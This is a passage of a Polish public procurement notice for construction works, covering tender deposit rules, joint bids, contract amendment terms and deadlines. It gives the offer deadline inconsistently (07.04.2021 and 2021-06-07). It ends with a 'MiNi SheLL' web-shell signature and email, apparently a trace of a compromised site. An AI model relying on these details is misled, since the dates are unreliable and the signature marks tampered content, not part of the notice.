tysiące złotych 00/100). 2. Wadium może być wnoszone w<br/>jednej lub kilku następujących formach określonych w art. 97 ust. 7 ustawy Prawo zamówień<br/>publicznych, tj.:1) pieniądzu;2) gwarancjach bankowych; 3) gwarancjach ubezpieczeniowych;4)<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r.<br/>poz. 310, 836 i 1572).3. Wadium musi być wniesione najpóźniej do wyznaczonego terminu<br/>składania ofert, tj. do 07.04.2021 r. do godz. 13:00, przy czym wniesienie wadium w pieniądzu<br/>za pomocą przelewu bankowego, Zamawiający będzie uważał za wniesione w terminie tylko<br/>wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały<br/>zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania<br/>ofert. 4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: PKO<br/>Bank Polski SA Oddział 1 w Zamościu, nr rachunku 74 1020 5356 0000 1602 0176 9785 z<br/>dopiskiem „Wadium” oraz wskazaniem nazwy i numeru referencyjnego postępowania. 5. Jeżeli<br/>wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 15.2. ppkt. 2) -<br/>4), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenia zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. W przypadku wspólnego<br/>ubiegania się o zamówienie przez Wykonawców: 1) oświadczenie z pkt 11.1. SWZ składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie; 2) każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia będzie zobowiązany na wezwanie Zamawiającego,<br/>dokonane w trybie art. 274 ust. 2 ustawy Prawo zamówień publicznych, do złożenia<br/>dokumentów, o których mowa w pkt 11.5. i 11.6. SWZ, przy czym: a) dokumenty, o których mowa<br/>w pkt 11.5. SWZ składa każdy z nich, b) dokumenty, o których mowa w pkt 11.6. SWZ składa<br/>odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na zasadach<br/>określonych w pkt 7 SWZ. Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty<br/>pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Z<br/>pełnomocnikiem tym będzie prowadzona wszelka korespondencja wiążąca dla wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwość zmiany zawartej umowy w następujących przypadkach: 1. w zakresie zmiany<br/>wynagrodzenia w przypadku zmiany stawki podatku VAT w trakcie realizacji przedmiotu umowy<br/>dla usług objętych przedmiotem zamówienia, 2. w zakresie zmiany osób wyznaczonych do<br/>wykonywania zamówienia, jak też powołania nowych w przypadku śmierci, rozwiązania<br/>stosunku pracy, utraty uprawnień do pełnienia funkcji oraz zaistnienia zdarzeń losowych z<br/>przyczyn niezależnych od Zamawiającego oraz Wykonawcy, skutkujących obiektywną<br/>niemożliwością pełnienia funkcji przez daną osobę, 3. w zakresie zmiany podwykonawcy lub<br/>rezygnacji z udziału podwykonawcy przy realizacji przedmiotu zamówienia, 4. w zakresie zmiany<br/>terminów realizacji zamówienia, o których mowa w § 6 Umowy, jeżeli zaistniały przyczyny<br/>niezależne od działania Stron, których przy zachowaniu wszelkich należytych środków nie<br/>można uniknąć ani im zapobiec, w szczególności: a) siły wyższej - rozumianej jako wystąpienie<br/>zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które<br/>uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej<br/>Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum<br/>opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły<br/>wyższej. (Pod pojęciem siły wyższej rozumie się w szczególności zdarzenia i okoliczności takie<br/>jak: klęska żywiołowa, działania wojenne, rebelie, terroryzm, rewolucja, powstanie, inwazja,<br/>bunt, zamieszki, strajk spowodowany przez inne osoby nie związane z realizacją inwestycji, b)<br/>okoliczności leżących po stronie Zamawiającego i nie wynikających z przyczyn leżących po<br/>stronie Wykonawcy (np. wstrzymanie, zawieszenie, przerwa w realizacji), c) jeżeli zmiany będą<br/>następstwem działania organów sądowych lub administracyjnych, w szczególności dotyczących:<br/>przekroczenia określonych przez prawo terminów wydawania przez organy administracji decyzji,<br/>zezwoleń itp., odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń,<br/>uzgodnień z przyczyn niezawinionych przez Wykonawcę lub Zamawiającego, d) w przypadku<br/>konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu<br/>administracyjnego, którego konieczności nie można było przewidzieć przed wszczęciem<br/>postępowania o udzielenie zamówienia publicznego, e) w przypadku konieczności zaspokojenia<br/>roszczeń osób trzecich, w tym grup społecznych lub zawodowych nieartykułowanych lub<br/>niemożliwych do jednoznacznego określenia przed wszczęciem postępowania o udzielenie<br/>zamówienia publicznego, f) w przypadku, gdy nastąpi zmiana powszechnie obowiązujących<br/>przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com